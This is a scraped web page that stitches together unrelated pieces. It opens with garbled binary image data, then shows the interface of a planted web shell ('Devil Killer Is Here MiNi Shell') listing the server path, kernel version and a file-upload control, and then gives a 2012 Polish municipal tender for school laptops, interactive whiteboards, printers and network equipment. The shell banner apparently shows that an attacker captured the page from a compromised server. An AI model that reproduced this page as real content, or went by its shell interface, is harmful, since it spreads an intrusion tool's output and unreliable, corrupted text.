JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/167981-N-2012.html

<p class="kh_header"><b>Brodnica: DOSTAWA Z MONTAŻEM POMOCY DYDAKTYCZNYCH I INNEGO SPRZĘTU NIEZBĘDNEGO DO REALIZACJI PROGRAMÓW NAUCZANIA Z WYKORZYSTANIEM TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH W RAMACH REALIZACJI RZĄDOWEGO PROGRAMU ROZWIJANIA KOMPETENCJI UCZNIÓW I NAUCZYCIELI W ZAKRESIE STOSOWANIA TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH - CYFROWA SZKOŁA</b><br>
<b>Numer ogłoszenia: 167981 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Brodnicy , ul. Kamionka 23, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 056 4930300, faks 056 4982626.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brodnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA Z MONTAŻEM POMOCY DYDAKTYCZNYCH I INNEGO SPRZĘTU NIEZBĘDNEGO DO REALIZACJI PROGRAMÓW NAUCZANIA Z WYKORZYSTANIEM TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH W RAMACH REALIZACJI RZĄDOWEGO PROGRAMU ROZWIJANIA KOMPETENCJI UCZNIÓW I NAUCZYCIELI W ZAKRESIE STOSOWANIA TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH - CYFROWA SZKOŁA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest dostawa z montażem pomocy dydaktycznych i innego sprzętu niezbędnego do realizacji programów nauczania z wykorzystaniem technologii informacyjno-komunikacyjnych w ramach realizacji Rządowego programu rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno-komunikacyjnych - Cyfrowa szkoła.
2.  	Zamawiający wymaga, aby oferta była kompletna. Brak którejkolwiek z pozycji spowoduje odrzucenie oferty jako niekompletnej.
3. 	Przy określeniu przedmiotu zamówienia Zamawiający nie posłużył się symbolem producenta. Opisane poniżej wymagania wobec sprzętu mają jedynie na celu precyzyjne określenie przedmiotu zamówienia, dopuszczając jednocześnie składanie ofert o parametrach równoważnych.
4. Zamawiający dopuszcza zaoferowanie produktów równoważnych, pod warunkiem, iż oferowany sprzęt będzie zgodny z opisem Zamawiającego pod względem wszystkich parametrów technicznych oraz wymagań jakościowych. W przypadku wątpliwości Zamawiającego, co do zaoferowanego przez Wykonawcę przedmiotu zamówienia, to na Wykonawcy ciążyć będzie obowiązek udokumentowania spełniania niniejszych warunków. Parametry zaoferowanego sprzętu nie mogą być gorsze jakościowo niż parametry przedmiotu zamówienia wskazanego przez Zamawiającego. 
5.  Oferowany sprzęt musi być fabrycznie nowy, najwyższej jakości. Termin fabrycznie nowy użyty powyżej oznacza, iż wszystkie elementy, z których wyprodukowano przedmiot zamówienia nie były wcześniej używane.
6. Jeżeli dostarczony przedmiot zamówienia będzie uszkodzony, zamawiający ma prawo je zwrócić do Wykonawcy. Wykonawca dostarczy w zamian sprawny produkt w czasie 4 dni od daty otrzymania reklamacji. Reklamacja może być zgłaszana przez Zamawiającego drogą telefoniczną lub faksem.
7.   Dostawa będzie kontrolowana przez Zamawiającego.
8.  Wykonawca dostarczy towar własnym transportem, na własny koszt, w sposób zapewniający ich całość i nienaruszalność, w miejsce wskazane przez Zamawiającego.
9.   Szczegółowy opis przedmiotu zamówienia:
Przedmiotem zamówienia jest dostawa wraz z montażem pomocy dydaktycznych i innego sprzętu niezbędnego do realizacji programów nauczania z wykorzystaniem technologii informacyjno-komunikacyjnych dla Szkoły Podstawowej nr 7 w Zespole Szkół nr 1 im. Karola Wojtyły-Jana Pawła II w Brodnicy w ramach Rządowego programu rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno-komunikacyjnych - Cyfrowa szkoła.


9.1. Wykaz sprzętu i oprogramowania


Lp
	
Nazwa	
Ilość	Wymagania wobec sprzętu
1	przenośny komputer dla ucznia	52		ekran o przekątnej co najmniej 15
 wydajność komputera w teście MobileMark*2007 Performance Rating Productivity Test min. 180 pkt
 pamięć operacyjna RAM co najmniej 4GB DDR3
 dysk twardy o pojemności co najmniej 250 GB
 łącze sieci bezprzewodowej zgodne ze standardem 802.11 b/g/n
 co najmniej dwa złącza USB, z czego co najmniej jeden USB 3,0
 złącze VGA
 złącze słuchawkowe
 zintegrowana kamera i mikrofon
 zintegrowana karta dźwiękowa
 fizyczna klawiatura, urządzenie wskazujące
 ciężar poniżej 2,5 kilograma
 czas pracy na baterii min. 4 godziny
 podwyższona wytrzymałość mechaniczna, np. stalowe zawiasy czy metalowe poszycie obudowy
 wypełnianie warunków Energy Star 5.0
 certyfikat ISO 9001 producenta sprzętu
 (rekomendacja) certyfikat komputera dla danego systemu operacyjnego (obecność
na Hardware Compatibility List)
 zainstalowany system operacyjny, zgodny z wyspecyfikowanymi poniżej wymaganiami
 zainstalowany pakiet oprogramowania biurowego, zgodny z wyspecyfikowanymi poniżej wymaganiami
 zainstalowane oprogramowanie chroniące komputer w przypadku kradzieży
 zainstalowane oprogramowanie antywirusowe oraz chroniące komputer ucznia przed niepożądanymi treściami z Internetu
 zainstalowane oprogramowanie do zarządzania
zestawem komputerów dla potrzeb edukacyjnych, wspierania prowadzenia zajęć z wykorzystaniem multimediów oraz systemem zbierania i  analizowania odpowiedzi
nośnik recowery z obrazem oprogramowania pozwalający na odtworzenie i przywrócenie ustawień początkowych sprzętu
 torba
 myszka
 zasilacz
	gwarancja na okres nie krótszy niż 3 lata 

2	przenośny komputer dla nauczyciela	8	 ekran o przekątnej co najmniej 15,6 ,podświetlenie LED
 wydajność komputera w teście Mobile Mark*2007 Performance Rating Productivity Test min. 230
 pamięć operacyjna RAM co najmniej 4GB, DDR3
 dysk twardy o pojemności co najmniej 500GB, wyposażony w system parkowania głowicy
w przypadku upadku, zapobiegający jego uszkodzeniu
 łącze sieci bezprzewodowej zgodne ze standardem 802.11 b/g/n
 co najmniej dwa złącza USB, z czego co najmniej jeden USB 3.0
 złącze VGA, lub możliwość podłączenia VGA za pomocą przejściówki
 złącze HDMI lub DisplayPort
 złącze słuchawkowe
 zintegrowana kamera i mikrofon
 zintegrowana karta dźwiękowa
 uniwersalny czytnik zewnętrznych kart pamięci
 podwyższona odporność mechaniczna, podwyższona wytrzymałość mechaniczna
 system zabezpieczenia danych na dysku twardym na wypadek upadku
 ciężar poniżej 2,7 kilograma
 czas pracy na baterii min. 4 godziny
	zasilacz
 torba
 myszka
 wypełnianie warunków Energy Star 5.0
 certyfikat ISO 9001 producenta sprzętu oraz deklaracja CE
 (rekomendacja) certyfikat komputera dla danego systemu operacyjnego (obecność na Hardware Compatibility List)
 zainstalowany system operacyjny zgodny z oddzielnie wyspecyfikowanymi wymaganiami
 zainstalowany pakiet oprogramowania biurowego, zgodny z oddzielnie
wyspecyfikowanymi wymaganiami
 zainstalowane oprogramowanie antywirusowe oraz chroniące komputer nauczyciela przed niepożądanymi treściami z Internetu
 zainstalowane oprogramowanie chroniące komputer w przypadku kradzieży
 zainstalowane oprogramowanie do zarządzania zestawem komputerów dla potrzeb edukacyjnych, wspierania prowadzenia zajęć z wykorzystaniem multimediów oraz systemem zbierania i analizowania odpowiedzi
 zainstalowane oprogramowanie do obsługi tablicy interaktywnej i innych akcesoriów współpracujących z komputerem (np. wizualizer)
nośnik recowery z obrazem oprogramowania pozwalający na odtwarzanie i przywrócenie ustawień początkowych sprzętu
 gwarancja na okres nie krótszy niż 3 lata 

3	szafka do przechowywania i bezpiecznego przemieszczania pomiędzy salami lekcyjnymi przenośnych komputerów dla uczniów, posiadającą funkcję ładowania baterii	2	 szafka mobilna umożliwiająca przechowywanie 26 lub więcej urządzeń i ładowanie ich baterii. Wewnątrz korpusu wózka zamontowana listwa zawierająca gniazda elektryczne do podłączenia ładowarek laptopów. Dwoje drzwi wózka zabezpieczone zamkiem na  klucz. Szafka musi posiadać atesty i klasyfikacje zgodne z Rozp. MSWia z 21.04.2006 r. w sprawie ochrony przeciwpożarowej budynków dotycząca miejsc użyteczności publicznej,
 urządzenie musi być dostosowane do pracy z napięciem 230V
 wbudowane urządzenie przeznaczone do bezawaryjnego podłączenia do sieci elektrycznej budynku
 gwarancja na okres nie krótszy niż 3 lata  
4	sieciowe urządzenie wielofunkcyjne umożliwiające co najmniej drukowanie, kopiowanie i skanowanie	2	 urządzenie gotowe do pracy (wyposażone we wszystkie niezbędne do pracy elementy oraz materiały eksploatacyjne o standardowej wydajności)
 funkcje urządzenia: kopiarka, laserowa drukarka sieciowa, kolorowy skaner sieciowy
 format oryginału A4, format kopii A4-A6
 prędkość drukowania nie mniej niż 5 stron A4/min kolor i nie mniej niż 20 stron A4/min. czarno-białe
 rozdzielczość drukowania nie gorsza niż 1200x600 dpi
 pamięć RAM min. 512 MB
 typy plików skanowania PDF, JPEG, TIFF, XPS
 panel operatora wyposażony w ekran LCD, opisy na panelu oraz komunikaty na ekranie w języku polskim
 dupleks
 podajnik dokumentów automatyczny, dwustronicowy na co najmniej 50 arkuszy
 kaseta na co najmniej 250 arkuszy papieru A5-A4 
 bęben drukujący na min. 100.000 wydruków A4
 interfejsy USB 2.0, Ethernet 10/100Base-TX, USB
dla pamięci przenośnej
 funkcje skanowania do: e-mail, FTP, SMB, TWAIN, WSD, pamięci przenośnej USB
 gwarancja na okres nie krótszy niż 3 lata 
5	drukarka	2	 urządzenie gotowe do pracy (wyposażone we wszystkie niezbędne do pracy elementy oraz materiały eksploatacyjne o standardowej wydajności)
 funkcje urządzenia: laserowa drukarka sieciowa, 
 format oryginału A4, format kopii A4-A6
 prędkość drukowania nie mniej niż 25 stron A4/min.
 rozdzielczość drukowania nie gorsza niż 1200x1200 dpi
 pamięć RAM min. 256 MB
 dupleks
 podajnik dokumentów automatyczny, dwustronicowy na co najmniej 50 arkuszy 
 kaseta na co najmniej 250 arkuszy papieru A5-A4
 interfejsy USB 2.0, Ethernet 10/100Base-TX, USB
dla pamięci przenośnej
 gwarancja na okres nie krótszy niż 3 lata 
6	skaner	1	Rozdzielczość min. 1200 dpi i 48-bitowa głębia koloru umożliwiają wierne skanowanie zdjęć 
Możliwość  obróbki dokumentów w postaci cyfrowej lub za pomocą technologii OCR przekształcanie dokumentów i artykułów w tekst do edycji - dołączone oprogramowanie OCR
 gwarancja na okres nie krótszy niż 3 lata
7	tablica interaktywna	3	 efektywna powierzchnia tablicy (obszar roboczy), o przekątnej co najmniej 82 cali, technologia dotykowa
 autoryzowany przez producenta tablicy serwis w Polsce, certyfikowany zgodnie z normą ISO 9001:2000 lub ISO 9001:2008 w zakresie urządzeń audiowizualnych
 wraz z tablicą dostarczenie przewodnika (w języku polskim): metodycznego dla nauczycieli dotyczącego wykorzystywania tablicy w procesie dydaktycznym i podręcznika użytkownika tablicy
 polska wersja językowa oprogramowania, wraz z pomocą kontekstową
 zabezpieczanie tworzonego dokumentu przed jego utratą poprzez automatyczne zapisywanie go co wybrany interwał czasu oraz odtwarzanie dokumentu po jego niekontrolowanym zamknięciu w sytuacji krytycznej wywołanej niestabilnością systemu
 dodatkowe funkcje pozwalające zabezpieczyć elementy ćwiczeń interaktywnych przed przypadkową edycją przez uczniów, ale pozwalające na ich przemieszczanie i obracanie
 możliwość instalacji oprogramowania na dowolnej liczbie komputerów będących w dyspozycji szkoły
 możliwość instalacji oprogramowania przez nauczycieli i uczniów na ich prywatnych komputerach
 bezpłatny i nieograniczony czasowo dostęp do aktualizacji i nowych wersji oprogramowania
 importowanie i eksportowanie materiałów powstałych na tablicy w czasie zajęć (notatek, obiektów) w formacie Whiteboard Common File Format (CFF)
 wpisywanie i zachowywanie notatek wykonanych przy pomocy tablicy w plikach popularnych aplikacji (przynamniej: MS Word, MS Excel, MS PowerPoint). Możliwość późniejszej edycji dokonanych wpisów i notatek w plikach za pomocą tych popularnych aplikacji
	konieczność działania oprogramowania tablicy z systemem operacyjnym na komputerach nauczycielskich i komputerach uczniowskich 
	gwarancja na okres nie krótszy niż 5 lat
8	system mocowania tablicy interaktywnej	3	 z prawidłowy montaż tablicy interaktywnej, jej prawidłowe działanie, bezpieczeństwo i stabilność, dodatkowo ukrycie kabli i zapewnienie wygody eksploatacji
 sposób montażu tablicy - podstawa jezdna do tablic interaktywnych z wysięgnikiem do projektora  dostosowana do typu tablicy i typu projektora
 gwarancja na okres nie krótszy niż 3 lata
9a	urządzenie i oprogramowanie do przeprowadzenia wideokonferencji	1		Elementy urządzenia: 
Jednostka centralna
Kamera o rozdzielczości HD Stacja komunikacyjna Mikrofon
Pilot zdalnego sterowania
Kable połączeniowe
	Komunikacja:
Standard H.323128 Kbps do 4Mbps
Złącze RJ45 (10/100Mbps)
Ręczne ustawienia transferu 
	Wyświetlanie:
Wsparcie dla NTSC / PAL / XGA (4:3 RGB) / HD 720p (16:9 RGB)
Współpraca z pojedynczym i podwójnym ekranem 
Różne układy wyświetlania obrazów
	Standardy wideo:
H.264, H.263, H.263+, H.261 Dwukierunkowa wymiana danych - H.239 
	Parametry wideo: 
Min 30 klatek na sekundę od 128kbps Obsługiwane rozdzielczości transmisji wideo z kamery:- QSIF (176x120), QCIF (176x144)- SIF (352x240), CIF (352x288)- 4SIF (704x480), 4CIF (704x576)- 720p (1280x720), 30 fps
Obsługiwane rozdzielczości transmisji współdzielonych materiałów:
 VGA (640x480)
 SVGA (800x600)
 XGA (1024x768)
 SXGA (1280x1024)
Protokół H.239 zapewniający transmisję współdzielonych materiałów
	Kamera - o rozdzielczości min 5 Megapikseli, i min 7 krotny zoom optyczny 
	Wejścia wideo - przynajmniej na kamerę PTZComposite Video (RCA)S-VideoVGA (D-Sub 15) 
	Wyjścia wideo przynajmniej 2 x VGA (D-Sub 15) Composite Video (RCA)S-Video 
	Funkcje audio - redukcja pogłosu; automatyczne wzmocnienie; redukcja szumów 
	Wejścia audio mini jack 3.5mm 
	Wyjścia audio mini jack 3.5mm Wbudowany głośnik min 10 W
	gwarancja na okres nie krótszy niż 3 lata 
9b	urządzenia i oprogramowanie do przeprowadzenia wideokonferencji	2		kamera IP min. rozdzielczość 800x600
	oprogramowanie do przesyłania danych Audio/Video
	gwarancja na okres nie krótszy niż 3 lata
10	system do zbierania i analizowania odpowiedzi	3	 narzędzie do zarządzania i sterowania zestawem komputerów dla potrzeb edukacyjnych
 narzędzie do wspierania prowadzenia zajęć z zastosowaniem multimediów oraz komunikacją nauczyciela z komputerami uczniów
 narzędzie do zbierania i analizowania odpowiedzi
 narzędzie do tworzenia i przeglądania prezentacji i pokazów wykonanych na tablicę interaktywną
 zainstalowanie na jednym komputerze produktów pochodzących od różnych producentów nie jest uznane za ofertę zintegrowanego pakietu
 prosta instalacja wszystkich składników oprogramowania. Możliwa instalacja zdalna
przez administratora
 integracja z oprogramowaniem tablicy interaktywnej
 identyfikacja uczniów za pomocą jednej listy we wszystkich aplikacjach 
 możliwość pracy z całą klasą oraz podział jej na grupy
 pełna polska wersja językowa interfejsu użytkownika, w tym także pomocy w języku polskim
 współpraca oprogramowania z innymi aplikacjami zainstalowanymi na komputerach ucznia i nauczyciela (pakiet biurowy)
 możliwość podglądu wszystkich monitorów uczniów na komputerze nauczyciela
 możliwość blokowania dostępu ucznia do komputera
 możliwość przesyłania informacji bezpośrednio na monitor komputera danego ucznia
 możliwość zaprezentowania widoku monitora dowolnego ucznia innym uczniom na ich ekranach
 łączenie uczniów w grupy i możliwość wspólnej pracy na bazie tego samego widoku, bez
konieczności odchodzenia od komputerów
 proste podłączanie i odłączanie komputerów do/od sieci szkolnej
 możliwość przygotowywania przez uczniów własnych profili za pomocą zdjęć, grafik i tekstu
 możliwość przygotowywania przez uczniów personalizowanych kalendarzy oraz przygotowywania i porządkowania notatek
 możliwość przeszukiwania plików według słów kluczowych, tematów lub daty
 możliwość tworzenia przez uczniów prac i prezentacji na tablicę interaktywną
 możliwość udzielania indywidualnych odpowiedzi na pytania testowe
 funkcja integracji z programem do przygotowywania i prowadzenia prezentacji
tak, aby testy i quizy można było tworzyć na podstawie istniejących prezentacji
 gwarancja na okres nie krótszy niż 3 lata

11	projektor krótkoogniskowy	3	 jasność nie gorsza niż 2200 ANSI lumenów w trybie pełnej jasności
 rozdzielczość podstawowa nie gorsza niż XGA (1024x768) min.
 kontrast co najmniej 2000:1
 żywotność lampy min. 3000 godzin w trybie pełnej jasności
 głośnik 1 x 10W lub 2 x 5W
 wejścia sygnałowe wizyjne 1 x HDMI, 1 x 15-pin Mini D-sub, 1 x Composite, 1 x S-video, 1 x
Component
 poziom hałasu max. 35 dB w trybie pełnej jasności
 dedykowany uchwyt producenta Wielopłaszczyznowej mechanicznej regulacji projektora
 sterownik do projektora z przyłączem sygnałowym i regulacją głośności (w jednej obudowie do montażu naściennego i okablowaniem producenta sterownika)
 gniazda wejściowe przynajmniej: 2x15-pin D-sub z audio, 1 x Composite video audio, USB typ B (do podłączenia do tablicy interaktywnej), 1 x wejście mikrofonowe
 sygnały wyjściowe przynajmniej: 1 x PC, 1 x Composite video, 1 x audio, 1 x USB
	format obrazu zgodny z formatem tablicy multimedialnej
	odległość projekcyjna maksymalnie 60 cm
	waga max. 6,5 kg
	gwarancja na projektor na okres nie krótszy niż 3 lata
	gwarancja na lampę na okres nie krótszy niż 3 lata
12	głośniki	5	 zestaw dwudrożnych kolumn stereofonicznych do zastosowania z tablicami interaktywnymi 
 moc wyjściowa RMS: 20W (2x10W)
 pasmo przenoszenia: 80 - 18000Hz
 porty wejściowe przynajmniej:
 1 x USB typ B
 3 x USB typ A
 2 x RCA
 HUB USB 2.0 (minimum dwa wejścia)
 stalowa siatka ochronna głośników uniemożliwiająca manipulowanie przy membranach
 przystosowane do instalacji na ścianie (uchwyty rekomendowane przez producenta głośnika)
 gwarancja na okres nie krótszy niż 3 lata
13a	kontroler WLAN zarządzający szkolną siecią bezprzewodową	1	 dynamiczne zarządzanie częstotliwością: automatyczna kontrola siły sygnału oraz wykorzystywanego kanału, aby zapewnić maksymalne pokrycie zasięgiem
 samonaprawiająca się sieć: automatyczna diagnostyka wraz z usuwaniem martwych stref WLAN. Punkty dostępowe z możliwością adaptacji siły sygnału oraz kanału w zależności od otoczenia
 balansowanie obciążeniem oraz ograniczanie przepustowości: gwarantowanie pasma wszystkim użytkownikom sieci bezprzewodowej bez utraty jakości sygnału
 dynamiczne balansowanie obciążeniem poprzez przełączanie użytkowników: w zależności od liczby użytkowników i zasięgu sygnału radiowego, kontroler umożliwiający przełączanie zarejestrowanych klientów pomiędzy mniej obciążone punkty dostępowe
 mapy pięter oraz propagacji sygnału: mapy propagacji sygnału na podstawie częstotliwości, kanału i siły sygnału
 prostota lokalizowania przez administratora wrogich punktów dostępowych, przyłączonych klientów oraz ich prezentacja na mapie budynku
 szybkie przełączanie pomiędzy VLAN oraz podsieciami: niezauważalne szybkie przełączanie w L2 oraz L3 wsparcie dla aplikacji wrażliwych na opóźnienia
 zoptymalizowanie pod centralne oraz rozproszone architektury: automatyczny przełączanie lokalnego ruchu w celu jak najszybszego przesłania. Przetwarzanie ruchu L3 jest na poziomie kontrolera oraz przesyłani do kontrolera za pomocą szyfrowanego tunelu
 dostęp dla połączenia typu gość
 gwarancja na okres nie krótszy niż 3 lata
13b	kontroler WLAN -pomocniczy-zarządzający pracą komputerów w sali lekcyjnej	1	 dynamiczne zarządzanie częstotliwością w jednej Sali lekcyjnej - współpracujący z jednym punktem dostępowym
 możliwość współpracy z z głównym kontrolerem WLAN - szkolnym
 gwarancja na okres nie krótszy niż 3 lata
14	punkt dostępowy będący elementem szkolnej sieci bezprzewodowej	2	 praca w standardzie 802.11n
 jednoczesna obsługa częstotliwości 2.4GHz
oraz 5GHz
 punkt dostępowy powinien współpracować również ze starszymi urządzeniami 802.11a,
802.11g oraz 802.11b
 zintegrowana obsługa Power over Ethernet (IEEE 802.3af PoE), zasilanie punktu dostępowego poprzez wykorzystanie do tego celu dedykowanego przełacznika sieciowego obsługującego system POE
 możliwość centralnego zarządzania poprzez kontroler
 obejmowanie dużego obszaru dzięki protokołowi WDS oraz połączeniu point-to-point lub point-to-multipoint
 funkcje bezpieczeństwa obejmujące WPA, WPA2, wykrywanie wrogich AP oraz 802.1x wraz z wsparciem dla RADIUS
 prosty oraz szybki montaż pozwalający na instalację na suficie oraz ścianie
 wewnętrzne anteny zoptymalizowane dla
największego możliwego zasięgu
	gwarancja na okres nie krótszy niż 3 lata 
15a	ruter (router) z wbudowanymi lub zewnętrznymi modułami zapory sieciowej i systemem blokowania włamań	1	 liczba jednoczesnych połączeń min. 65000
 ochrona przed zagrożeniami płynącymi z sieci Internet
 skaner antywirusowy oraz baza sygnatur, zabezpieczenia sieci przed zagrożeniami typu wirusy, robaki, konie trojańskie, spyware, rootkity, keyloggery
 wbudowana technologia rozproszonego wykrywania spamu nie wymagająca dodatkowej konfiguracji 
 kontrola aplikacji P2P oraz komunikatorów internetowych
 możliwość blokowania w czasie rzeczywistym ataków z internetu, wbudowany system blokowania włamań IPS oraz wbudowana funkcja zapory sieciowej
 obsługa IPsec & SSL VPN
	gwarancja na okres nie krótszy niż 3 lata 
15b	router (pomocniczy)	1	 liczba jednoczesnych połączeń min. 65000
 ochrona przed zagrożeniami płynącymi z sieci Internet
 możliwość blokowania w czasie rzeczywistym ataków z internetu, wbudowany system blokowania włamań IPS oraz wbudowana funkcja zapory sieciowej
 obsługa IPsec & SSL VPN
 gwarancja na okres nie krótszy niż 3 lata
16	projektor multimedialny	3	 jasność nie gorsza niż 2600 ANSI Lumenów w trybie pełnej jasności
 rozdzielczość podstawowa nie gorsza niż XGA (1024x768)
 kontrast co najmniej 2000:1
 żywotność lampy min. 3000 godzin w trybie pełnej jasności
 poziom hałasu max. 35dB w trybie pełnej jasności
 obiektyw Zoom
	 torba
 gwarancja na projektor na okres nie krótszy niż 3 lata 
 gwarancja na lampę na okres nie krótszy niż 3 lata
17	ekran projekcyjny	2	 szerokość min. 170 cm (powierzchnia projekcyjna)
 ekran na statywie
 waga maksymalnie 10 kg
 wysokość ekranu po złożeniu maksymalnie 200 cm
 rączka do przenoszenia zamontowana na stałe do ekranu
 ramię do optycznej korekcji efektu trapezowego - na stałe połączone z ekranem
 blokada mechanizmu rozwijania ekranu na czas transportu
	gwarancja na okres nie krótszy niż 3 lata 
18	wizualizer	2	 przetwornik minimum 1,3 megapikseli,
 efektywna liczba pikseli nie gorsza niż 1080 (H) x 1024 (V)
 minimalna liczba klatek nie mniej niż 30 klatek na sekundę
 rozdzielczość RGB na wyjściu nie gorsza niż 800 (H) x 800 (V) linii TV
 zoom elektryczny
 maksymalny obszar filmowanej powierzchni 420 mm x 315 mm,
 minimalny obszar filmowanej powierzchni 93 mm x 75 mm,
 fokus automatyczny / manualny,
 regulacja jasności automatyczna / manualna
 oświetlenie LED fi lmowanego obszaru
 certyfi kat CE i zgodność z Dyrektywą RoHS, Energy Star
 porty przynajmniej: USB
 dostarczenie wraz z urządzeniem podręcznika
użytkownika i instrukcji instalacji w języku polskim
 automatyczna współpraca z oprogramowaniem
